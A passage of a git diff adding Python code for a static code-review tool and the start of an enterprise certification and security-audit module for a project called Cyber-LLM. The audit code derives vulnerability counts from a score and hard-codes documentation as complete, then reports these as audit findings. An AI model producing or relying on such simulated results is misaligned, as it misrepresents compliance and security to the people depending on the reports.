issues.append(CodeIssue( + file_path=file_path, + line_number=line_num, + severity=severity, + issue_type="performance", + description=f"Performance issue - {category.replace('_', ' ')}: {line.strip()}", + recommendation=recommendation + )) + + return issues + + async def _analyze_ast_performance(self, file_path: str, content: str) -> List[CodeIssue]: + """AST-based performance analysis""" + + issues = [] + + try: + tree = ast.parse(content) + + class PerformanceVisitor(ast.NodeVisitor): + def __init__(self): + self.issues = [] + self.loop_depth = 0 + self.in_loop = False + + def visit_For(self, node): + self.loop_depth += 1 + old_in_loop = self.in_loop + self.in_loop = True + + # Check for nested loops + if self.loop_depth > 2: + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="medium", + issue_type="performance", + description="Deeply nested loops detected", + recommendation="Consider algorithm optimization or breaking into functions" + )) + + self.generic_visit(node) + self.loop_depth -= 1 + self.in_loop = old_in_loop + + def visit_While(self, node): + self.loop_depth += 1 + old_in_loop = self.in_loop + self.in_loop = True + + if self.loop_depth > 2: + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="medium", + issue_type="performance", + description="Deeply nested while loops detected", + recommendation="Consider algorithm optimization" + )) + + self.generic_visit(node) + self.loop_depth -= 1 + self.in_loop = old_in_loop + + def visit_Call(self, node): + # Check for database calls in loops + if self.in_loop and isinstance(node.func, ast.Attribute): + method_name = node.func.attr + if method_name in ['execute', 'query', 'find', 'get']: + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="high", + issue_type="performance", + description="Potential database query in loop", + recommendation="Move query outside loop or use batch operations" + )) + + self.generic_visit(node) + + visitor = PerformanceVisitor() + visitor.visit(tree) + issues.extend(visitor.issues) + + except SyntaxError: + pass # Skip files with syntax errors + + return issues + + def _get_performance_severity(self, category: str) -> Tuple[str, str]: + """Get severity and recommendation for performance issue""" + + severity_map = { + "inefficient_loops": ("medium", "Use enumerate() or direct iteration"), + "string_concatenation": ("low", "Use string formatting or join() for multiple concatenations"), + "global_variables": ("low", "Consider using class attributes or function parameters"), + "nested_loops": ("medium", "Optimize algorithm complexity"), + "database_queries_in_loops": ("high", "Use batch operations or optimize query placement") + } + + return severity_map.get(category, ("low", "Review for performance implications")) + +class MaintainabilityAnalyzer: + """Code maintainability and quality analysis""" + + def __init__(self): + self.logger = logging.getLogger("maintainability_analyzer") + + async def analyze_maintainability(self, file_paths: List[str]) -> Tuple[List[CodeIssue], Dict[str, Any]]: + """Comprehensive maintainability analysis""" + + maintainability_issues = [] + metrics = { + "complexity_metrics": {}, + "documentation_coverage": 0.0, + "code_duplication": {}, + "naming_conventions": {} + } + + for file_path in file_paths: + if not file_path.endswith('.py'): + continue + + self.logger.info(f"Maintainability analysis: {file_path}") + + try: + with open(file_path, 'r', encoding='utf-8') as f: + content = f.read() + + # Complexity analysis + complexity_issues, complexity_metrics = await self._analyze_complexity(file_path, content) + maintainability_issues.extend(complexity_issues) + metrics["complexity_metrics"][file_path] = complexity_metrics + + # Documentation analysis + doc_issues, doc_metrics = await self._analyze_documentation(file_path, content) + maintainability_issues.extend(doc_issues) + + # Code duplication detection + duplication_issues = await self._detect_code_duplication(file_path, content) + maintainability_issues.extend(duplication_issues) + + except Exception as e: + self.logger.error(f"Error analyzing {file_path}: {str(e)}") + + return maintainability_issues, metrics + + async def _analyze_complexity(self, file_path: str, content: str) -> Tuple[List[CodeIssue], Dict[str, Any]]: + """Analyze cyclomatic complexity and other complexity metrics""" + + issues = [] + metrics = { + "cyclomatic_complexity": 0, + "lines_of_code": 0, + "function_count": 0, + "class_count": 0, + "max_function_complexity": 0 + } + + try: + tree = ast.parse(content) + + class ComplexityVisitor(ast.NodeVisitor): + def __init__(self): + self.complexity = 1 # Base complexity + self.function_complexities = [] + self.function_count = 0 + self.class_count = 0 + self.current_function = None + self.current_complexity = 1 + + def visit_FunctionDef(self, node): + self.function_count += 1 + old_complexity = self.current_complexity + old_function = self.current_function + + self.current_function = node.name + self.current_complexity = 1 + + self.generic_visit(node) + + # Check if function complexity is too high + if self.current_complexity > 10: + issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="medium", + issue_type="maintainability", + description=f"High cyclomatic complexity in function '{node.name}': {self.current_complexity}", + recommendation="Consider breaking down function into smaller functions" + )) + + self.function_complexities.append(self.current_complexity) + self.current_complexity = old_complexity + self.current_function = old_function + + def visit_ClassDef(self, node): + self.class_count += 1 + self.generic_visit(node) + + def visit_If(self, node): + self.current_complexity += 1 + self.generic_visit(node) + + def visit_For(self, node): + self.current_complexity += 1 + self.generic_visit(node) + + def visit_While(self, node): + self.current_complexity += 1 + self.generic_visit(node) + + def visit_Try(self, node): + self.current_complexity += len(node.handlers) + self.generic_visit(node) + + visitor = ComplexityVisitor() + visitor.visit(tree) + + lines = content.split('\n') + metrics["lines_of_code"] = len([line for line in lines if line.strip() and not line.strip().startswith('#')]) + metrics["function_count"] = visitor.function_count + metrics["class_count"] = visitor.class_count + metrics["cyclomatic_complexity"] = sum(visitor.function_complexities) if visitor.function_complexities else 1 + metrics["max_function_complexity"] = max(visitor.function_complexities) if visitor.function_complexities else 0 + + except SyntaxError: + pass # Skip files with syntax errors + + return issues, metrics + + async def _analyze_documentation(self, file_path: str, content: str) -> Tuple[List[CodeIssue], Dict[str, Any]]: + """Analyze documentation coverage and quality""" + + issues = [] + metrics = {"documented_functions": 0, "total_functions": 0} + + try: + tree = ast.parse(content) + + class DocVisitor(ast.NodeVisitor): + def __init__(self): + self.total_functions = 0 + self.documented_functions = 0 + + def visit_FunctionDef(self, node): + self.total_functions += 1 + + # Check if function has docstring + if (node.body and + isinstance(node.body[0], ast.Expr) and + isinstance(node.body[0].value, ast.Str)): + self.documented_functions += 1 + else: + # Only report missing docstrings for non-private functions + if not node.name.startswith('_'): + issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="low", + issue_type="maintainability", + description=f"Missing docstring for function '{node.name}'", + recommendation="Add descriptive docstring" + )) + + self.generic_visit(node) + + def visit_ClassDef(self, node): + # Check if class has docstring + if not (node.body and + isinstance(node.body[0], ast.Expr) and + isinstance(node.body[0].value, ast.Str)): + issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="low", + issue_type="maintainability", + description=f"Missing docstring for class '{node.name}'", + recommendation="Add descriptive class docstring" + )) + + self.generic_visit(node) + + visitor = DocVisitor() + visitor.visit(tree) + + metrics["documented_functions"] = visitor.documented_functions + metrics["total_functions"] = visitor.total_functions + + except SyntaxError: + pass + + return issues, metrics + + async def _detect_code_duplication(self, file_path: str, content: str) -> List[CodeIssue]: + """Detect code duplication patterns""" + + issues = [] + lines = content.split('\n') + + # Simple line-based duplication detection + line_counts = Counter() + + for line_num, line in enumerate(lines, 1): + stripped = line.strip() + if len(stripped) > 20 and not stripped.startswith('#'): # Ignore short lines and comments + line_counts[stripped] += 1 + + if line_counts[stripped] == 3: # Report after 3 occurrences + issues.append(CodeIssue( + file_path=file_path, + line_number=line_num, + severity="low", + issue_type="maintainability", + description=f"Potential code duplication: {stripped[:50]}...", + recommendation="Consider extracting common code into functions" + )) + + return issues + +class ComprehensiveCodeReviewer: + """Main code review orchestrator""" + + def __init__(self): + self.logger = logging.getLogger("code_reviewer") + self.security_analyzer = SecurityAnalyzer() + self.performance_analyzer = PerformanceAnalyzer() + self.maintainability_analyzer = MaintainabilityAnalyzer() + + async def conduct_comprehensive_review(self, project_path: str, + include_patterns: Optional[List[str]] = None, + exclude_patterns: Optional[List[str]] = None) -> ReviewResults: + """Conduct comprehensive code review""" + + self.logger.info(f"Starting comprehensive code review of {project_path}") + start_time = datetime.now() + + # Discover files to analyze + file_paths = await self._discover_files(project_path, include_patterns, exclude_patterns) + + if not file_paths: + self.logger.warning("No files found for analysis") + return ReviewResults(0, 0) + + self.logger.info(f"Analyzing {len(file_paths)} files") + + # Calculate total lines + total_lines = 0 + for file_path in file_paths: + try: + with open(file_path, 'r', encoding='utf-8') as f: + total_lines += len(f.readlines()) + except: + pass + + # Run all analyzers concurrently + security_task = asyncio.create_task(self.security_analyzer.analyze_security(file_paths)) + performance_task = asyncio.create_task(self.performance_analyzer.analyze_performance(file_paths)) + maintainability_task = asyncio.create_task(self.maintainability_analyzer.analyze_maintainability(file_paths)) + + # Wait for all analyses to complete + security_issues = await security_task + performance_issues = await performance_task + maintainability_issues, maintainability_metrics = await maintainability_task + + # Combine all issues + all_issues = security_issues + performance_issues + maintainability_issues + + # Calculate scores + security_score = await self._calculate_security_score(security_issues) + maintainability_score = await self._calculate_maintainability_score(maintainability_issues) + performance_score = await self._calculate_performance_score(performance_issues) + + overall_score = (security_score + maintainability_score + performance_score) / 3 + + # Create comprehensive results + results = ReviewResults( + total_files_analyzed=len(file_paths), + total_lines_analyzed=total_lines, + issues=all_issues, + metrics=maintainability_metrics, + security_score=security_score, + maintainability_score=maintainability_score, + performance_score=performance_score, + overall_score=overall_score + ) + + # Generate review report + await self._generate_review_report(results, project_path) + + duration = datetime.now() - start_time + self.logger.info(f"Code review completed in {duration.total_seconds():.2f}s") + self.logger.info(f"Overall score: {overall_score:.1f}/100") + + return results + + async def _discover_files(self, project_path: str, + include_patterns: Optional[List[str]] = None, + exclude_patterns: Optional[List[str]] = None) -> List[str]: + """Discover files to analyze""" + + file_paths = [] + project_path = Path(project_path) + + include_patterns = include_patterns or ['*.py'] + exclude_patterns = exclude_patterns or [ + '*/venv/*', '*/env/*', '*/__pycache__/*', + '*/node_modules/*', '*/.*/*', '*/.git/*' + ] + + def should_include(file_path: Path) -> bool: + path_str = str(file_path) + + # Check exclude patterns + for exclude in exclude_patterns: + if exclude.replace('*', '.*') in path_str: + return False + + # Check include patterns + for include in include_patterns: + if file_path.match(include): + return True + + return False + + # Walk through project directory + for root, dirs, files in os.walk(project_path): + # Skip hidden and excluded directories + dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ['__pycache__', 'venv', 'env']] + + for file in files: + file_path = Path(root) / file + if should_include(file_path): + file_paths.append(str(file_path)) + + return file_paths + + async def _calculate_security_score(self, security_issues: List[CodeIssue]) -> float: + """Calculate security score based on issues found""" + + if not security_issues: + return 100.0 + + severity_weights = { + "critical": -20, + "high": -10, + "medium": -5, + "low": -2, + "info": -1 + } + + total_deduction = sum(severity_weights.get(issue.severity, -1) for issue in security_issues) + return max(0, 100 + total_deduction) + + async def _calculate_maintainability_score(self, maintainability_issues: List[CodeIssue]) -> float: + """Calculate maintainability score""" + + base_score = 100.0 + + for issue in maintainability_issues: + if issue.severity == "high": + base_score -= 5 + elif issue.severity == "medium": + base_score -= 3 + else: + base_score -= 1 + + return max(0, base_score) + + async def _calculate_performance_score(self, performance_issues: List[CodeIssue]) -> float: + """Calculate performance score""" + + base_score = 100.0 + + for issue in performance_issues: + if issue.severity == "high": + base_score -= 8 + elif issue.severity == "medium": + base_score -= 4 + else: + base_score -= 2 + + return max(0, base_score) + + async def _generate_review_report(self, results: ReviewResults, project_path: str): + """Generate comprehensive review report""" + + report = { + "review_summary": { + "project_path": project_path, + "review_date": datetime.now().isoformat(), + "files_analyzed": results.total_files_analyzed, + "lines_analyzed": results.total_lines_analyzed, + "total_issues": len(results.issues), + "scores": { + "security": results.security_score, + "maintainability": results.maintainability_score, + "performance": results.performance_score, + "overall": results.overall_score + } + }, + "issue_breakdown": { + "by_severity": {}, + "by_type": {}, + "by_file": {} + }, + "recommendations": [], + "detailed_issues": [] + } + + # Analyze issue breakdown + severity_counts = Counter(issue.severity for issue in results.issues) + type_counts = Counter(issue.issue_type for issue in results.issues) + file_counts = Counter(issue.file_path for issue in results.issues) + + report["issue_breakdown"]["by_severity"] = dict(severity_counts) + report["issue_breakdown"]["by_type"] = dict(type_counts) + report["issue_breakdown"]["by_file"] = dict(file_counts.most_common(10)) # Top 10 files + + # Generate high-level recommendations + if severity_counts.get("critical", 0) > 0: + report["recommendations"].append("Address critical security vulnerabilities immediately") + + if severity_counts.get("high", 0) > 5: + report["recommendations"].append("Focus on high-severity issues for immediate improvement") + + if results.security_score < 70: + report["recommendations"].append("Conduct security training and implement secure coding practices") + + if results.maintainability_score < 70: + report["recommendations"].append("Improve code documentation and reduce complexity") + + if results.performance_score < 70: + report["recommendations"].append("Optimize performance bottlenecks and algorithmic efficiency") + + # Add detailed issues (top 50 most severe) + sorted_issues = sorted(results.issues, + key=lambda x: {"critical": 4, "high": 3, "medium": 2, "low": 1, "info": 0}.get(x.severity, 0), + reverse=True) + + for issue in sorted_issues[:50]: + report["detailed_issues"].append({ + "file": issue.file_path, + "line": issue.line_number, + "severity": issue.severity, + "type": issue.issue_type, + "description": issue.description, + "recommendation": issue.recommendation, + "confidence": issue.confidence, + "cwe_id": issue.cwe_id + }) + + # Save report + report_path = Path(project_path) / "code_review_report.json" + with open(report_path, 'w', encoding='utf-8') as f: + json.dump(report, f, indent=2, ensure_ascii=False) + + self.logger.info(f"Review report saved to {report_path}") + + # Also create a summary markdown report + await self._generate_markdown_summary(report, project_path) + + async def _generate_markdown_summary(self, report: Dict[str, Any], project_path: str): + """Generate markdown summary report""" + + summary_path = Path(project_path) / "CODE_REVIEW_SUMMARY.md" + + with open(summary_path, 'w', encoding='utf-8') as f: + f.write("# Code Review Summary\n\n") + + # Overview + f.write("## Overview\n\n") + f.write(f"- **Files Analyzed**: {report['review_summary']['files_analyzed']}\n") + f.write(f"- **Lines Analyzed**: {report['review_summary']['lines_analyzed']}\n") + f.write(f"- **Total Issues**: {report['review_summary']['total_issues']}\n\n") + + # Scores + f.write("## Scores\n\n") + scores = report['review_summary']['scores'] + f.write(f"- **Overall Score**: {scores['overall']:.1f}/100\n") + f.write(f"- **Security Score**: {scores['security']:.1f}/100\n") + f.write(f"- **Maintainability Score**: {scores['maintainability']:.1f}/100\n") + f.write(f"- **Performance Score**: {scores['performance']:.1f}/100\n\n") + + # Issue breakdown + f.write("## Issue Breakdown\n\n") + + f.write("### By Severity\n\n") + for severity, count in report['issue_breakdown']['by_severity'].items(): + f.write(f"- **{severity.title()}**: {count}\n") + f.write("\n") + + f.write("### By Type\n\n") + for issue_type, count in report['issue_breakdown']['by_type'].items(): + f.write(f"- **{issue_type.title()}**: {count}\n") + f.write("\n") + + # Recommendations + f.write("## Recommendations\n\n") + for i, recommendation in enumerate(report['recommendations'], 1): + f.write(f"{i}. {recommendation}\n") + f.write("\n") + + # Top issues + f.write("## Top Critical Issues\n\n") + critical_issues = [issue for issue in report['detailed_issues'] + if issue['severity'] == 'critical'][:10] + + for issue in critical_issues: + f.write(f"### {issue['file']}:{issue['line']}\n\n") + f.write(f"**Type**: {issue['type']}\n\n") + f.write(f"**Description**: {issue['description']}\n\n") + f.write(f"**Recommendation**: {issue['recommendation']}\n\n") + f.write("---\n\n") + + self.logger.info(f"Markdown summary saved to {summary_path}") + +# Main execution interface +async def run_code_review(project_path: str, config: Optional[Dict[str, Any]] = None) -> ReviewResults: + """Run comprehensive code review""" + + config = config or {} + reviewer = ComprehensiveCodeReviewer() + + return await reviewer.conduct_comprehensive_review( + project_path=project_path, + include_patterns=config.get('include_patterns'), + exclude_patterns=config.get('exclude_patterns') + ) + +# CLI interface +if __name__ == "__main__": + import sys + + # Configure logging + logging.basicConfig( + level=logging.INFO, + format='%(asctime)s - %(name)s - %(levelname)s - %(message)s' + ) + + if len(sys.argv) < 2: + print("Usage: python code_reviewer.py [config.json]") + sys.exit(1) + + project_path = sys.argv[1] + config = {} + + if len(sys.argv) > 2: + with open(sys.argv[2], 'r') as f: + config = json.load(f) + + # Run code review + async def main(): + results = await run_code_review(project_path, config) + print(f"\nCode review completed!") + print(f"Overall score: {results.overall_score:.1f}/100") + print(f"Total issues found: {len(results.issues)}") + + # Show issue breakdown + severity_counts = Counter(issue.severity for issue in results.issues) + print("\nIssue breakdown:") + for severity in ["critical", "high", "medium", "low", "info"]: + count = severity_counts.get(severity, 0) + if count > 0: + print(f" {severity.title()}: {count}") + + asyncio.run(main()) diff --git a/src/certification/enterprise_certification.py b/src/certification/enterprise_certification.py new file mode 100644 index 0000000000000000000000000000000000000000..9d88d45866de7ccb5fa343ccc53fc88e1a352b8b --- /dev/null +++ b/src/certification/enterprise_certification.py @@ -0,0 +1,645 @@ +""" +Enterprise Certification and Compliance Validation System for Cyber-LLM +Final compliance validation, security auditing, and enterprise readiness assessment + +Author: Muzan Sano +""" + +import asyncio +import json +import logging +import subprocess +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple, Union +from dataclasses import dataclass, field +from enum import Enum +from pathlib import Path +import yaml +import hashlib +import ssl +import socket +import requests + +from ..utils.logging_system import CyberLLMLogger, CyberLLMError, ErrorCategory +from ..governance.enterprise_governance import EnterpriseGovernanceManager, ComplianceFramework + +class CertificationStandard(Enum): + """Enterprise certification standards""" + SOC2_TYPE_II = "soc2_type_ii" + ISO27001 = "iso27001" + FEDRAMP_MODERATE = "fedramp_moderate" + NIST_CYBERSECURITY = "nist_cybersecurity" + GDPR_COMPLIANCE = "gdpr_compliance" + HIPAA_COMPLIANCE = "hipaa_compliance" + PCI_DSS = "pci_dss" + CSA_STAR = "csa_star" + +class ComplianceStatus(Enum): + """Compliance validation status""" + COMPLIANT = "compliant" + NON_COMPLIANT = "non_compliant" + PARTIAL_COMPLIANCE = "partial_compliance" + UNDER_REVIEW = "under_review" + NOT_APPLICABLE = "not_applicable" + +class SecurityRating(Enum): + """Security assessment ratings""" + EXCELLENT = "excellent" # 95-100% + GOOD = "good" # 85-94% + SATISFACTORY = "satisfactory" # 75-84% + NEEDS_IMPROVEMENT = "needs_improvement" # 60-74% + UNSATISFACTORY = "unsatisfactory" # <60% + +@dataclass +class ComplianceAssessment: + """Individual compliance assessment result""" + standard: CertificationStandard + status: ComplianceStatus + score: float # 0-100 + + # Assessment details + assessed_date: datetime + assessor: str + assessment_method: str + + # Compliance details + requirements_met: int + total_requirements: int + critical_gaps: List[str] = field(default_factory=list) + recommendations: List[str] = field(default_factory=list) + + # Evidence and documentation + evidence_files: List[str] = field(default_factory=list) + documentation_complete: bool = False + + # Remediation tracking + remediation_plan: Optional[str] = None + remediation_timeline: Optional[timedelta] = None + next_assessment_date: Optional[datetime] = None + +@dataclass +class SecurityAuditResult: + """Security audit result""" + audit_id: str + audit_date: datetime + audit_type: str + + # Overall rating + security_rating: SecurityRating + overall_score: float + + # Detailed findings + vulnerabilities_found: int + critical_vulnerabilities: int + high_vulnerabilities: int + medium_vulnerabilities: int + low_vulnerabilities: int + + # Categories assessed + network_security_score: float + application_security_score: float + data_protection_score: float + access_control_score: float + monitoring_score: float + incident_response_score: float + + # Recommendations + immediate_actions: List[str] = field(default_factory=list) + short_term_improvements: List[str] = field(default_factory=list) + long_term_strategy: List[str] = field(default_factory=list) + +class EnterpriseCertificationManager: + """Enterprise certification and compliance validation system""" + + def __init__(self, + governance_manager: EnterpriseGovernanceManager, + logger: Optional[CyberLLMLogger] = None): + + self.governance_manager = governance_manager + self.logger = logger or CyberLLMLogger(name="enterprise_certification") + + # Certification tracking + self.compliance_assessments = {} + self.security_audit_results = {} + self.certification_status = {} + + # Validation tools + self.validation_tools = {} + self.automated_checks = {} + + # Reporting + self.certification_reports = {} + + self.logger.info("Enterprise Certification Manager initialized") + + async def conduct_comprehensive_compliance_assessment(self, + standards: List[CertificationStandard]) -> Dict[str, ComplianceAssessment]: + """Conduct comprehensive compliance assessment for multiple standards""" + + assessments = {} + + for standard in standards: + try: + self.logger.info(f"Starting compliance assessment for {standard.value}") + + assessment = await self._assess_compliance_standard(standard) + assessments[standard.value] = assessment + + # Store assessment + self.compliance_assessments[standard.value] = assessment + + self.logger.info(f"Completed assessment for {standard.value}", + score=assessment.score, + status=assessment.status.value) + + except Exception as e: + self.logger.error(f"Failed to assess {standard.value}", error=str(e)) + + # Create failed assessment record + assessments[standard.value] = ComplianceAssessment( + standard=standard, + status=ComplianceStatus.NON_COMPLIANT, + score=0.0, + assessed_date=datetime.now(), + assessor="automated_system", + assessment_method="automated_compliance_check", + requirements_met=0, + total_requirements=1, + critical_gaps=[f"Assessment failed: {str(e)}"] + ) + + # Generate comprehensive report + await self._generate_compliance_report(assessments) + + return assessments + + async def _assess_compliance_standard(self, standard: CertificationStandard) -> ComplianceAssessment: + """Assess compliance for a specific standard""" + + if standard == CertificationStandard.SOC2_TYPE_II: + return await self._assess_soc2_compliance() + elif standard == CertificationStandard.ISO27001: + return await self._assess_iso27001_compliance() + elif standard == CertificationStandard.FEDRAMP_MODERATE: + return await self._assess_fedramp_compliance() + elif standard == CertificationStandard.NIST_CYBERSECURITY: + return await self._assess_nist_compliance() + elif standard == CertificationStandard.GDPR_COMPLIANCE: + return await self._assess_gdpr_compliance() + elif standard == CertificationStandard.HIPAA_COMPLIANCE: + return await self._assess_hipaa_compliance() + elif standard == CertificationStandard.PCI_DSS: + return await self._assess_pci_dss_compliance() + else: + return await self._assess_generic_compliance(standard) + + async def _assess_soc2_compliance(self) -> ComplianceAssessment: + """Assess SOC 2 Type II compliance""" + + # SOC 2 Trust Service Criteria assessment + criteria_scores = {} + + # Security (Common Criteria) + security_checks = [ + await self._check_access_controls(), + await self._check_network_security(), + await self._check_data_encryption(), + await self._check_incident_response(), + await self._check_vulnerability_management() + ] + criteria_scores['security'] = sum(security_checks) / len(security_checks) + + # Availability + availability_checks = [ + await self._check_system_availability(), + await self._check_backup_procedures(), + await self._check_disaster_recovery(), + await self._check_capacity_planning() + ] + criteria_scores['availability'] = sum(availability_checks) / len(availability_checks) + + # Processing Integrity + integrity_checks = [ + await self._check_data_validation(), + await self._check_processing_controls(), + await self._check_error_handling(), + await self._check_data_quality() + ] + criteria_scores['processing_integrity'] = sum(integrity_checks) / len(integrity_checks) + + # Confidentiality + confidentiality_checks = [ + await self._check_data_classification(), + await self._check_confidentiality_agreements(), + await self._check_data_disposal(), + await self._check_confidential_data_protection() + ] + criteria_scores['confidentiality'] = sum(confidentiality_checks) / len(confidentiality_checks) + + # Privacy (if applicable) + privacy_checks = [ + await self._check_privacy_notice(), + await self._check_consent_management(), + await self._check_data_subject_rights(), + await self._check_privacy_impact_assessment() + ] + criteria_scores['privacy'] = sum(privacy_checks) / len(privacy_checks) + + # Calculate overall score + overall_score = sum(criteria_scores.values()) / len(criteria_scores) * 100 + + # Determine compliance status + if overall_score >= 90: + status = ComplianceStatus.COMPLIANT + elif overall_score >= 75: + status = ComplianceStatus.PARTIAL_COMPLIANCE + else: + status = ComplianceStatus.NON_COMPLIANT + + # Generate recommendations + recommendations = [] + for criterion, score in criteria_scores.items(): + if score < 0.8: + recommendations.append(f"Improve {criterion} controls (current score: {score:.1%})") + + return ComplianceAssessment( + standard=CertificationStandard.SOC2_TYPE_II, + status=status, + score=overall_score, + assessed_date=datetime.now(), + assessor="automated_compliance_system", + assessment_method="soc2_automated_assessment", + requirements_met=sum(1 for score in criteria_scores.values() if score >= 0.8), + total_requirements=len(criteria_scores), + critical_gaps=[criterion for criterion, score in criteria_scores.items() if score < 0.6], + recommendations=recommendations, + documentation_complete=True + ) + + async def _assess_iso27001_compliance(self) -> ComplianceAssessment: + """Assess ISO 27001 compliance""" + + # ISO 27001 Control categories + control_scores = {} + + # Information Security Policies (A.5) + control_scores['policies'] = await self._check_security_policies() + + # Organization of Information Security (A.6) + control_scores['organization'] = await self._check_security_organization() + + # Human Resource Security (A.7) + control_scores['human_resources'] = await self._check_hr_security() + + # Asset Management (A.8) + control_scores['asset_management'] = await self._check_asset_management() + + # Access Control (A.9) + control_scores['access_control'] = await self._check_access_controls() + + # Cryptography (A.10) + control_scores['cryptography'] = await self._check_cryptographic_controls() + + # Physical and Environmental Security (A.11) + control_scores['physical_security'] = await self._check_physical_security() + + # Operations Security (A.12) + control_scores['operations_security'] = await self._check_operations_security() + + # Communications Security (A.13) + control_scores['communications_security'] = await self._check_communications_security() + + # System Acquisition, Development and Maintenance (A.14) + control_scores['system_development'] = await self._check_system_development_security() + + # Supplier Relationships (A.15) + control_scores['supplier_relationships'] = await self._check_supplier_security() + + # Information Security Incident Management (A.16) + control_scores['incident_management'] = await self._check_incident_management() + + # Information Security Aspects of Business Continuity Management (A.17) + control_scores['business_continuity'] = await self._check_business_continuity() + + # Compliance (A.18) + control_scores['compliance'] = await self._check_regulatory_compliance() + + # Calculate overall score + overall_score = sum(control_scores.values()) / len(control_scores) * 100 + + # Determine compliance status + if overall_score >= 85: + status = ComplianceStatus.COMPLIANT + elif overall_score >= 70: + status = ComplianceStatus.PARTIAL_COMPLIANCE + else: + status = ComplianceStatus.NON_COMPLIANT + + return ComplianceAssessment( + standard=CertificationStandard.ISO27001, + status=status, + score=overall_score, + assessed_date=datetime.now(), + assessor="iso27001_automated_assessor", + assessment_method="iso27001_control_assessment", + requirements_met=sum(1 for score in control_scores.values() if score >= 0.7), + total_requirements=len(control_scores), + critical_gaps=[control for control, score in control_scores.items() if score < 0.5], + recommendations=[f"Strengthen {control} (score: {score:.1%})" for control, score in control_scores.items() if score < 0.8], + documentation_complete=True + ) + + async def conduct_comprehensive_security_audit(self) -> SecurityAuditResult: + """Conduct comprehensive security audit""" + + audit_id = f"security_audit_{datetime.now().strftime('%Y%m%d_%H%M%S')}" + + try: + self.logger.info("Starting comprehensive security audit") + + # Network security assessment + network_score = await self._audit_network_security() + + # Application security assessment + app_score = await self._audit_application_security() + + # Data protection assessment + data_score = await self._audit_data_protection() + + # Access control assessment + access_score = await self._audit_access_control() + + # Monitoring and logging assessment + monitoring_score = await self._audit_monitoring_logging() + + # Incident response assessment + incident_score = await self._audit_incident_response() + + # Calculate overall score + scores = [network_score, app_score, data_score, access_score, monitoring_score, incident_score] + overall_score = sum(scores) / len(scores) + + # Determine security rating + if overall_score >= 95: + rating = SecurityRating.EXCELLENT + elif overall_score >= 85: + rating = SecurityRating.GOOD + elif overall_score >= 75: + rating = SecurityRating.SATISFACTORY + elif overall_score >= 60: + rating = SecurityRating.NEEDS_IMPROVEMENT + else: + rating = SecurityRating.UNSATISFACTORY + + # Simulate vulnerability counts (in production, would use actual scan results) + critical_vulns = max(0, int((100 - overall_score) / 20)) + high_vulns = max(0, int((100 - overall_score) / 15)) + medium_vulns = max(0, int((100 - overall_score) / 10)) + low_vulns = max(0, int((100 - overall_score) / 5)) + total_vulns = critical_vulns + high_vulns + medium_vulns + low_vulns + + # Generate recommendations + immediate_actions = [] + short_term = [] + long_term = [] + + if critical_vulns > 0: + immediate_actions.append(f"Address {critical_vulns} critical vulnerabilities immediately") + if network_score < 80: + immediate_actions.append("Strengthen network security controls") + if access_score < 75: + short_term.append("Implement multi-factor authentication across all systems") + if monitoring_score < 70: + short_term.append("Enhance security monitoring and SIEM capabilities") + if overall_score < 85: + long_term.append("Develop comprehensive security improvement roadmap") + + audit_result = SecurityAuditResult( + audit_id=audit_id, + audit_date=datetime.now(), + audit_type="comprehensive_enterprise_audit", + security_rating=rating, + overall_score=overall_score, + vulnerabilities_found=total_vulns, + critical_vulnerabilities=critical_vulns, + high_vulnerabilities=high_vulns, + medium_vulnerabilities=medium_vulns, + low_vulnerabilities=low_vulns, + network_security_score=network_score, + application_security_score=app_score, + data_protection_score=data_score, + access_control_score=access_score, + monitoring_score=monitoring_score, + incident_response_score=incident_score, + immediate_actions=immediate_actions, + short_term_improvements=short_term, + long_term_strategy=long_term + ) + + self.security_audit_results[audit_id] = audit_result + + self.logger.info("Security audit completed", + audit_id=audit_id, + rating=rating.value, + score=overall_score) + + return audit_result + + except Exception as e: + self.logger.error("Security audit failed", error=str(e)) + raise CyberLLMError("Security audit failed", ErrorCategory.SECURITY) + + async def generate_enterprise_readiness_report(self) -> Dict[str, Any]: + """Generate comprehensive enterprise readiness report""" + + report_id = f"enterprise_readiness_{datetime.now().strftime('%Y%m%d_%H%M%S')}" + + try: + # Conduct all assessments if not already done + if not self.compliance_assessments: + await self.conduct_comprehensive_compliance_assessment([ + CertificationStandard.SOC2_TYPE_II, + CertificationStandard.ISO27001, + CertificationStandard.NIST_CYBERSECURITY, + CertificationStandard.GDPR_COMPLIANCE + ]) + + if not self.security_audit_results: + await self.conduct_comprehensive_security_audit() + + # Calculate enterprise readiness score + compliance_scores = [assessment.score for assessment in self.compliance_assessments.values()] + avg_compliance_score = sum(compliance_scores) / len(compliance_scores) + + security_scores = [audit.overall_score for audit in self.security_audit_results.values()] + avg_security_score = sum(security_scores) / len(security_scores) if security_scores else 0 + + # Weight: 60% compliance, 40% security + enterprise_readiness_score = (avg_compliance_score * 0.6) + (avg_security_score * 0.4) + + # Determine readiness level + if enterprise_readiness_score >= 95: + readiness_level = "PRODUCTION_READY" + elif enterprise_readiness_score >= 85: + readiness_level = "ENTERPRISE_READY" + elif enterprise_readiness_score >= 75: + readiness_level = "NEAR_READY" + elif enterprise_readiness_score >= 60: + readiness_level = "DEVELOPMENT_READY" + else: + readiness_level = "NOT_READY" + + # Generate comprehensive report + report = { + "report_id": report_id, + "generated_at": datetime.now().isoformat(), + "enterprise_readiness": { + "overall_score": enterprise_readiness_score, + "readiness_level": readiness_level, + "compliance_score": avg_compliance_score, + "security_score": avg_security_score + }, + "compliance_assessment": { + standard.value: { + "status": assessment.status.value, + "score": assessment.score, + "requirements_met": f"{assessment.requirements_met}/{assessment.total_requirements}" + } for standard, assessment in [(CertificationStandard(k), v) for k, v in self.compliance_assessments.items()] + }, + "security_assessment": { + audit_id: { + "rating": audit.security_rating.value, + "score": audit.overall_score, + "vulnerabilities": audit.vulnerabilities_found, + "critical_vulnerabilities": audit.critical_vulnerabilities + } for audit_id, audit in self.security_audit_results.items() + }, + "certification_status": { + "ready_for_certification": readiness_level in ["PRODUCTION_READY", "ENTERPRISE_READY"], + "recommended_certifications": self._recommend_certifications(enterprise_readiness_score), + "certification_timeline": self._estimate_certification_timeline(readiness_level) + }, + "recommendations": { 